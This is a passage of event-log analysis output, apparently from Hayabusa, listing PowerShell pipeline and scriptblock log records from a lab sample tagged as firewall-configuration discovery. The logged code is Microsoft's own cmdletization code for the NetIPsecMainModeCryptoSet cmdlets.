$false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true 